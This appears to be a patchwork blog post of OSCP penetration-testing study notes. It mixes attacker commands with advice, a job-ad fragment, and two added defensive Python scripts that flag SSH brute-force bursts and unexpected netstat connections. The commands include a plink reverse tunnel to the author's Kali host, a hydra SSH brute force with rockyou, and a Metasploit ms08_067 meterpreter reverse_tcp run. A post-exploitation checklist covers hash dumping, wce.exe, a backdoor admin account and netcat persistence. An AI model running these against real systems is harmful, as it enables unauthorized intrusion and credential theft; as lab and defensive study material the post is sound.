OSCP Notes
I am posting some notes from my OSCP course for documentation reasons. I have found that executing the right command can make the difference between owning a system or not. Sometimes I found myself going through the same procedure/attack twice or thrice only to find out that I was not applying the right command, which cost me the machine.
Make sense of these commands where you need them, as I cannot reveal where they were used:
plink.exe -l root -pw <password> <your kali IP> -R yourport:127.0.0.1:theirport
hydra -v -V -L user.txt -P /usr/share/wordlists/rockyou.txt -t 16 192.168.33.251 ssh
hydra has the -w option to slow it down.
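The defender's counterpart to the hydra run above, added here as an example that is not part of the original notes: a small Python detector that reads sshd's authentication log, flags a source address once it produces a burst of failed logins inside a time window, records which usernames it tried, and notes whether a login from that source was accepted afterwards. The log lines are constructed samples in OpenSSH syslog format, and the threshold (5 failures) and window (60 seconds) are assumed values you would tune for your own hosts.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of /var/log/auth.log lines (OpenSSH syslog format). Not real data.
SAMPLE_AUTH_LOG = """\
Mar  3 10:00:01 host sshd[2101]: Failed password for invalid user admin from 192.0.2.10 port 50211 ssh2
Mar  3 10:00:02 host sshd[2102]: Failed password for invalid user admin from 192.0.2.10 port 50212 ssh2
Mar  3 10:00:02 host sshd[2103]: Failed password for root from 192.0.2.10 port 50213 ssh2
Mar  3 10:00:03 host sshd[2104]: Failed password for root from 192.0.2.10 port 50214 ssh2
Mar  3 10:00:03 host sshd[2105]: Failed password for root from 192.0.2.10 port 50215 ssh2
Mar  3 10:00:04 host sshd[2106]: Failed password for oracle from 192.0.2.10 port 50216 ssh2
Mar  3 10:00:40 host sshd[2110]: Accepted password for root from 192.0.2.10 port 50230 ssh2
Mar  3 10:05:00 host sshd[2200]: Failed password for alice from 198.51.100.7 port 40001 ssh2
Mar  3 10:07:00 host sshd[2201]: Accepted publickey for alice from 198.51.100.7 port 40002 ssh2
"""

# Matches both "Failed password for invalid user X" and "Accepted publickey for X".
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_events(log_text):
    """Turn sshd auth lines into dicts; lines that are not login results are ignored."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # Syslog timestamps carry no year; relative ordering is all we need here.
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
        events.append({"ts": ts, "result": m.group("result"),
                       "user": m.group("user"), "ip": m.group("ip")})
    return events


def detect_brute_force(log_text, threshold=5, window_seconds=60):
    """Return {source_ip: finding} for sources with >= threshold failures in any window.

    A finding records the largest failure count seen in one window, every username
    that source tried, and the username of any accepted login from it after the burst.
    """
    recent = defaultdict(list)     # ip -> failure timestamps inside the sliding window
    tried = defaultdict(set)       # ip -> usernames attempted
    findings = {}
    for ev in parse_events(log_text):
        ip = ev["ip"]
        if ev["result"] == "Failed":
            tried[ip].add(ev["user"])
            cutoff = ev["ts"] - timedelta(seconds=window_seconds)
            recent[ip] = [t for t in recent[ip] if t >= cutoff] + [ev["ts"]]
            if len(recent[ip]) >= threshold:
                f = findings.setdefault(
                    ip, {"failures": 0, "users": set(), "success_after_burst": None})
                f["failures"] = max(f["failures"], len(recent[ip]))
                f["users"] |= tried[ip]
        elif ip in findings:
            # A success from a source that already tripped the threshold is the
            # line worth paging on: the guessing may have worked.
            findings[ip]["success_after_burst"] = ev["user"]
    return findings


if __name__ == "__main__":
    for ip, f in detect_brute_force(SAMPLE_AUTH_LOG).items():
        print(ip, f["failures"], "failures, users tried:", sorted(f["users"]),
              "accepted afterwards:", f["success_after_burst"])
```

The single failure from 198.51.100.7 followed by a key-based login never reaches the threshold and is not reported; the burst from 192.0.2.10 is, together with the later accepted password login for root from the same address.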
#####
- Assist in creating and maintaining IT security policies and procedures leveraged by the IT department.
- Identify IT security compliance control gaps and oversee the documentation and implementation of IT controls to mitigate any found process control gap.
- BS in Computer Science, Information Technology, or a minimum of 5 years IT security related experience.
- Certified Information Systems Security Professional (CISSP) required
- Familiarity with Nmap, NetStumbler, Nessus, Nikto, BackTrack, Harvester, Hping, Wireshark, Metasploit, and other security related tools
#####
Always scan the machine thoroughly, so you won't miss a vulnerability.
Always run netstat on a machine to check whether other machines are connected to it.
Gabriel FTP machine – enumerate the FTP service banner for a clue on how to grab proof.txt.
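For the netstat advice above, here is an added Python helper (not from the original notes) that turns `netstat -ant` output into a list of established connections whose peer lies outside the address ranges you expect, and classifies each as inbound (the local port is one the host is listening on) or outbound. It goes slightly beyond the note by accepting both the Linux and the Windows netstat layouts, since the last three columns carry the same meaning in both. The netstat text and the 10.11.0.0/16 trusted range are constructed for the example.

```python
import ipaddress
from dataclasses import dataclass

# Constructed Linux `netstat -ant` output. Not from a real host.
SAMPLE_NETSTAT_LINUX = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 10.11.1.5:80            0.0.0.0:*               LISTEN
tcp        0      0 10.11.1.5:22            10.11.0.4:51522         ESTABLISHED
tcp        0      0 10.11.1.5:80            203.0.113.9:60012       ESTABLISHED
tcp        0      0 10.11.1.5:49152         192.0.2.77:443          ESTABLISHED
tcp        0      0 10.11.1.5:51000         10.11.1.9:445           ESTABLISHED
tcp6       0      0 :::3389                 :::*                    LISTEN
"""

# Constructed Windows `netstat -an` output. Not from a real host.
SAMPLE_NETSTAT_WINDOWS = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    10.11.1.22:445         10.11.0.4:49801        ESTABLISHED
  TCP    10.11.1.22:49730       198.51.100.20:8080     ESTABLISHED
  UDP    0.0.0.0:123            *:*
"""


@dataclass
class Conn:
    proto: str
    local_ip: str
    local_port: str
    peer_ip: str
    peer_port: str
    state: str


def split_endpoint(endpoint):
    """'10.11.1.5:22' -> ('10.11.1.5', '22'); ':::3389' -> ('::', '3389')."""
    host, port = endpoint.rsplit(":", 1)
    return host, port


def parse_netstat(text):
    """Parse TCP rows from Linux or Windows netstat output; header and UDP rows are skipped."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or not parts[0].lower().startswith("tcp"):
            continue
        # Linux: proto recv-q send-q local peer state; Windows: proto local peer state.
        local, peer, state = parts[-3], parts[-2], parts[-1]
        lip, lport = split_endpoint(local)
        pip, pport = split_endpoint(peer)
        conns.append(Conn(parts[0].lower(), lip, lport, pip, pport, state))
    return conns


def review_connections(text, trusted_cidrs):
    """Return (direction, peer_ip, peer_port, local_port) for established connections
    whose peer is outside every trusted network."""
    trusted = [ipaddress.ip_network(c) for c in trusted_cidrs]
    conns = parse_netstat(text)
    # Windows prints LISTENING, Linux prints LISTEN; both mark a local service port.
    listening = {c.local_port for c in conns if c.state.startswith("LISTEN")}
    findings = []
    for c in conns:
        if c.state != "ESTABLISHED":
            continue
        peer = ipaddress.ip_address(c.peer_ip)
        if any(peer in net for net in trusted):
            continue
        direction = "inbound" if c.local_port in listening else "outbound"
        findings.append((direction, c.peer_ip, c.peer_port, c.local_port))
    return findings


if __name__ == "__main__":
    for sample in (SAMPLE_NETSTAT_LINUX, SAMPLE_NETSTAT_WINDOWS):
        for finding in review_connections(sample, ["10.11.0.0/16"]):
            print(*finding)
```

An unexpected outbound connection from a high local port is the pattern to look hardest at, since a foreign peer on a service port you did not open is exactly what the note about other machines being connected is meant to catch.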
######
My personal advice is to start from the well-known exploits (e.g. SMB), the ones where you know the connection between enumeration and exploitation. Then try to enumerate everything and start to search for relationships between services, ports and exploits. I personally began to succeed only by spending time in the lab and on each machine … leaving a machine too soon is frustrating, and every time I found that on the machine I left I was closer to the solution than I thought!
I repeat, it's personal advice; everyone has his own way to get things done.
For a particular problem you can also chat with your fellows and admins on IRC …
…and finally… Try Harder(R)! 😛
#####
exploit = exploit/windows/smb/ms08_067_netapi
payload = windows/meterpreter/reverse_tcp
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.XXX.XXX.XXX
set LHOST 192.XXX.XXX.XXX
show payloads
set PAYLOAD windows/meterpreter/reverse_tcp
set TARGET 0
exploit
and it will run (msfconsole's set takes "option value" with no equals sign).
@@@
Enumeration is the key. I know everyone says that, but it's very accurate. Check ALL of the ports with nmap; nmap only does the top 1000 ports by default, and some things are non-standard. Use different tools. Dirbuster, Dirb, Nikto, Metasploit auxiliary scanners: all are very helpful in finding hidden web applications and directories.
Eliminate the easy stuff on every box. You find a user name and password, try basic SQL injection, look up the software and download the source code to get a better idea of what it's doing. Read the README files, see what the default passwords and user names are.
Don't get tunnel vision (this one is huge for me); there are many, many red herrings out there. There are applications running that you swear are the way in, but it simply won't work. If you feel like you are banging your head on the wall, look for something else.
Go back and watch the videos and read the PDF. Just going through the motions on the exercises shows you what can be done; putting it to use is the key.
Also, do all of the exercises, they are invaluable. Don't just follow along, figure out what it's doing and why it's doing it.
Finally, don't be afraid to ask for help in IRC. The chat room is an invaluable resource. Nobody has given me an answer, but they point me in the right direction when I'm stuck. Just don't let that be your first choice; expect to hear "Try harder" if you've only tried two or three things. If you are asking for help, have a list ready of the things you've tried. When most see that you are in fact trying harder, and just overlooking it, they normally point you in the right direction.
Good luck, and don't get discouraged. This is hard, plain and simple. But it's hard for a reason, because having this shows you absolutely know your stuff.
Good luck!
@@@@
Words of encouragement and advice. I followed them and, sure enough, I hacked my first machine. All I needed was a starting point. I think I'm going to carry on working through all of the machines (in IP order) and then come up with some sort of procedure.
So far I have (for internal tests):
Enumerate:
- Ping sweep (Bash script or Nmap)
- DNS (Bash script or tools)
- Port scan (us + nmap), both TCP and UDP
- Banner grabbing on port scan results
- SNMP enum on port scan results
- SMB enum on port scan results
- SMTP enum based on port scan results
Exploit:
- Using appropriate tools based on enum results and services running
Pillage:
- Dig for files
- Dump hashes (keeping a record of all usernames with passwords for later use)
- wce.exe (if it works)
Maintaining Access:
- Backdoor admin
- Netcat/sdb (as a batch/Bash file, at command, or startup value in reg)
Clean Up:
- Haven't gotten that far yet.
Repeat until done…
It would be really handy if PBNJ had a nifty web front end for queries and reporting.
@@@@@
Will be continued…